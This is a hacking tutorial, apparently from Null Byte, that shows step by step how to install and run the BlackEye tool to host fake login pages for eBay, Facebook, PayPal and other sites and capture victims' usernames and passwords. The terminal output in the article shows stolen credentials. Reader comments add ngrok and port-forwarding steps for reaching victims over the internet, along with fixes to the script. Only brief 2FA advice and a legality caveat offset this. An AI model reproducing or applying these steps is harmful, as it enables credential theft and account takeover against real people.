How To: Phish for Social Media & Other Account Passwords with BlackEye

Social media accounts are a favorite target for hackers, and the most effective tactics for attacking accounts on websites like Facebook, Instagram, and Twitter are often based on phishing. These password-stealing attacks rely on tricking users into entering their passwords into a convincing fake webpage, and they have become increasingly easy to make thanks to tools like BlackEye.

BlackEye is a tool to rapidly generate phishing pages that target social media websites, making it much easier to phish targets of opportunity on the same network. After redirecting a target to the phishing page, it's easy to capture passwords to social media accounts harvested from unwitting targets.

BlackEye for Social Media Phishing

Users place a lot of trust in their social media accounts. If the target doesn't have 2FA enabled, the ease with which an attacker can access them may be surprising. A single mistake typing a password into the wrong website can be all it takes to lose access to your account. BlackEye is a proof of concept that shows how these phishing pages don't need to be sophisticated or customized to work effectively.

Don't Miss: Track a Target Using Canary Token Tracking Links

BlackEye is a straightforward bash script that presents several templates to pick from, allowing you to select which social media website to emulate. From there, it creates a functional phishing site on your device, with the ability to be port forwarded or connected in other ways to your target's machine.

Supported Social Media Sites

BlackEye supports 32 different websites with phishing templates, but these range in quality. It's best to test them out before deploying them because some suffer from flaws that could give them away if a user is paying attention. While the default phishing pages provided with BlackEye are pretty good, it's always useful to be able to modify them. That way, you can remove things like a copyright notice from the wrong year.

Among the more interesting websites that BlackEye supports are Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal, and Google. You can test these quickly by following the steps below and clicking on the phishing URL to find out how realistic each template looks before using it.

What You'll Need

BlackEye is an extremely straightforward tool but works best on Kali Linux. That's because of the number of dependencies it relies on to run, but these can be installed as needed on Ubuntu or Debian devices. Once you have a Kali distro fully updated, you should be ready to install BlackEye.

Don't Miss: Research a Person or Organization Using the Operative Framework

Step 1: Download & Test BlackEye

First, we'll need to clone the source from BlackEye's GitHub repository. To do that, open a new terminal window and type the following git and cd commands.

Note: we used the original BlackEye tool built by thelinuxchoice in this tutorial, but it has since been taken down from GitHub. You can use An0nUD4Y's version, which builds upon thelinuxchoice's original. Instructions below have been updated to use this tool instead.

~$ git clone https://github.com/An0nUD4Y/blackeye

Cloning into 'blackeye'...
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.

~$ cd blackeye

~/blackeye$

That should install the BlackEye repository and enable it to run it from the blackeye folder with the bash blackeye.sh command. When we run the command, we should see the splash screen below.

~/blackeye$ bash blackeye.sh

:: Disclaimer: Developers assume no liability and are not    ::
     :: responsible for any misuse or damage caused by BlackEye.  ::
     :: Only use for educational purporses!!                      ::

     :: Attacking targets without mutual consent is illegal!      ::

[01] Instagram      [17] IGFollowers   [33] Custom     BLACKEYE  v1.1
[02] Facebook       [18] eBay                      ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat       [19] Pinterest                 ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter        [20] CryptoCurrency            ▒█▐▒▒▒████████████▒▒▒▒
[05] Github         [21] Verizon                   ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google         [22] DropBox                   ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify        [23] Adobe ID                  ▐┼▐▒▒██████████████▒▒▒
[08] Netflix        [24] Shopify                   ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal         [25] Messenger                 ▒▒█████──────────▐███▌
[10] Origin         [26] GitLab                    ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam          [27] Twitch                    ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo          [28] MySpace                   ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin       [29] Badoo                     ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail     [30] VK                        ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] Wordpress      [31] Yandex                    ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft      [32] devianART               CODED BY:  @thelinuxchoice
                                                 UPGRADED BY: @suljot_gjoka

Step 2: Adjust Phishing Websites

If we don't like something like an expired copyright notice, we can change it pretty easily. First, exit out of the bash script back into the blackeye folder. Then, we'll type ls to see the sites folder within the BlackEye repo.

~/blackeye$ ls

blackeye.sh  LICENSE  README.md  sites

We can navigate to it using the cd sites command. Then, type ls to see all of the phishing site templates available to modify.

~/blackeye$ cd sites
~/blackeye/sites$ ls

adobe   cryptocurrency  facebook  google          linkedin   myspace  paypal      shopify   spotify  twitter  wordpress
badoo   devianart       github    instafollowers  messenger  netflix  pinterest   shopping  steam    verizon  yahoo
create  dropbox         gitlab    instagram       microsoft  origin   protonmail  snapchat  twitch   vk       yandex

To edit Protonmail, we can type cd protonmail and then ls again to see the files in that folder. You should see something like the files below.

~/blackeye/sites$ cd protonmail
~/blackeye/sites/protonmail$ ls

index_files  index.php  ip.php  ip.txt  login.html  login.php  saved.ip.txt  saved.usernames.txt

To edit the HTML of the phishing page, you can do so directly by opening login.html with a text editor, allowing you to easily update any copyright notices or other details.

Step 3: Serve Up the Phishing Page

To start our phishing page, open a terminal window and navigate to the blackeye folder again. Then, run the bash blackeye.sh command to get back to the phishing page selection menu. Here, we'll select eBay, which is number 18.

~/blackeye/sites/protonmail$ cd
~$ cd blackeye
~/blackeye$ bash blackeye.sh

[01] Instagram      [17] IGFollowers   [33] Custom     BLACKEYE  v1.1
[02] Facebook       [18] eBay                      ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat       [19] Pinterest                 ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter        [20] CryptoCurrency            ▒█▐▒▒▒████████████▒▒▒▒
[05] Github         [21] Verizon                   ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google         [22] DropBox                   ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify        [23] Adobe ID                  ▐┼▐▒▒██████████████▒▒▒
[08] Netflix        [24] Shopify                   ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal         [25] Messenger                 ▒▒█████──────────▐███▌
[10] Origin         [26] GitLab                    ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam          [27] Twitch                    ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo          [28] MySpace                   ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin       [29] Badoo                     ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail     [30] VK                        ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] Wordpress      [31] Yandex                    ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft      [32] devianART               CODED BY:  @thelinuxchoice
                                                 UPGRADED BY: @suljot_gjoka

[*] Choose an option: 18

After entering the number of the site you wish to create, press enter. Next, we'll be asked to supply our IP address. If you press enter without adding one, it will try to add yours by default, but it doesn't always work. After supplying your IP address, you should see something like the prompt below.

[*] Put your local IP (Default 10.0.6.27):

[*] Starting php server...
[*] Send this link to the Victim: 192.168.0.16
[*] Waiting victim open the link ...

Next, navigate to the phishing link in a browser to see the result of your phishing site.

Step 4: Capture a Password

When you open the site in a browser, it should look something like this:

How to Phish for Social Media & Other Account Passwords with BlackEye

Opening the link causes the script to report back on the type of devices currently accessing the phishing page.

[*] Waiting victim open the link ...

[*] IP Found!
[*] Victim IP: 192.168.43.142
[*] User-Agent:  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
[*] Saved: shopping/saved.ip.txt

Once the target enters their credentials, they're redirected to the real eBay page, creating the illusion of a successful login.

On the hacker's side, BlackEye provides us with the credentials our target just entered.

[*] Waiting credentials ...

[*] Credentials Found!
[*] Account: fudruckers
[*] Password:  thefudruckerking69
[*] Saved: sites/shopping/saved.usernames.txt

Just like that, we've intercepted and saved the credentials a target entered into our phishing page!

Phishing Social Media Sites Is Fast & Easy

When it comes to stopping attacks like this, two-factor authentication is the average user's best friend. Without it, a single mistake can lead to your password being stolen and used to access your account by an attacker. So set up 2FA on Facebook, Instagram, and whatever other accounts you have.

Another step towards improving security is to use a hardware security key to require new devices to use your key to log in, rendering stolen passwords and even intercepted text messages useless. Keep in mind that while BlackEye makes phishing easy, it doesn't make it legal to steal passwords for accounts that you don't have permission to access.

I hope you enjoyed this guide to phishing social media passwords! If you have any questions about this tutorial on social media phishing tools please ask below, and if you have a comment or idea for a future episode, feel free to reach me on Twitter @KodyKinzie.

Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:

Cover photo and screenshots by Kody/Null Byte

46 Comments

Good morning. I'm new in this field. Pls how can phishing link be sent over the internet with dedicated url and ip

Hey man,

I've been following your tutorials for quite some time now and i'm really enjoying them, whilst trying to follow your steps in this tutorial i came across an problem with the ngrok server.

When blackeye starts the ngrok server, i don't get an link to send to the victim, do you have any solutions for this problem?

printf "\e1;92m[\e[0m*\e[1;92m Send this link to the Victim:\e0m\e[1;77m %s\e[0m\n" $link

i am facing same problem,is there anyone who can solve this problem?

have you got any clue to get the link ?

Hey man, did u get the solution for it

Best thing you can do is port forward yourself

Step 1:

Open two terminal tabs and start a phishing page on LAN, the link might look like http://192.168.1.111:4444 or 127.0.0.1:4444

On the other terminal authenticate ngrok and keep it ready

Step 2:

Uploading the phishing page to internet using port forwarding:
On the other terminal do:
sudo ./ngrok http 127.0.0.1:4444

Step 3:

Send the new link generated by ngrok:
It will be different and will look something like this:
1f00a2103dc6.ngrok.io
1f00a2103dc6.ngrok.io

Feel free to correct me

Replace this bold text:
./ngrok http 3333 > /dev/null 2>&1 &
sleep 10

link=$(curl -s -N _127.0.0.1:4040/status | grep -o "https://0-9a-z\.ngrok.io")
With this:
link=$(curl -s -N 127.0.0.1:4040/api/tunnels | grep -o "https://0-9a-z\.ngrok.io")

pls a tutorial on how to change the adress is it with dns redirect ?

Kody, I don't think it really works. It works only if we open the link in our own browser. Somehow it simply opens the .Html file located in the black eye folder. I have tested it twice but the link is not opening in my other computer + I have tested it on my friend^s laptop too. So is there any other tool like this that actually works?

to do it over the internet u need a landing page

when i enter my ip it directs me to my router login is there something im missing

Blackeye tool is not working anymore

it work in firefox

Can anybody walk me through how to configure & send phish links outside of my network?? It only works on devices in range of my wifi

You just need to port forward it to the internet. Google port forwarding and you'll find plenty.

Thank you for sharing this amazing information. I am also want to become an ethical hacker and you content is soo amazing. Once again thanks for sharing this information about phishing.

Is there a version for windows instead of Linux?

I modified the Facebook login.html because it is not at all convincing by a Facebook html that I copied on the Facebook site but the problem is that I no longer capture the credentials when i run blackeye. can someone help me ?? thank you

Can anyone let me know how to do it on internet??

link dose not work other browser

None NGROK doesn't need any

the git hub link which u have shared is showing error 404 message!.. how to install it

That link is outdated. Here is the newer one: github.com/An0nUD4Y/blackeye

Before it downloads it asks for my user name and password for GitHub and it lets me type my username and password but after it says "Repository not found.

fatal: repository 'github.com/thelinuxchoice/blackeye/' not found", do I need to fix something?

That link is outdated. Here is the newer one: github.com/An0nUD4Y/blackeye

It is not working.

Same problem.

Please help me. After blackeye loads, It is not showing any link.

(Ignore the second pic)

Agent Toast, you have to activate NGROK with your auth token.
dashboard.ngrok.com/get-started/setup

How to activate

Hi everybody !

I managed to install blackeye but when I create a facebook page it displays badly. How could I update the facebook page to make it more current?

Thanks

I am confused of how to update the copyright in login.html...and also the website generated looks preety old.

The link generated is malicious,how can I hide it in a way that it is more convincing?

Hey guys, for those who don't get a link, I found a solution

After starting the script and the servers start you have to go to 127.0.0.1:4040/status. There you will se the link, it looks like "https://0-9a-z+\.ngrok.io". That is the link you have to send. Hope this helped!

I tried getting blackeye and it was requesting for a github.com username and a password. I need help please...

you must try it as the root user

It works only if the target is in our WiFi.

If you port forward it then it will work over WAN(internet)

Please tell me how to use it through the internet instead of the LAN

Just portforward. Its the same . Just youre Local IP would be something like 10.0.0.7. But of course check yours via "ifconfig" OR "ipconfig". Hope it helps;)

We can actually use social engineering kit in Kali linux to clone a website and use it like BlackEye. Could be more faulty but you would have WAY more options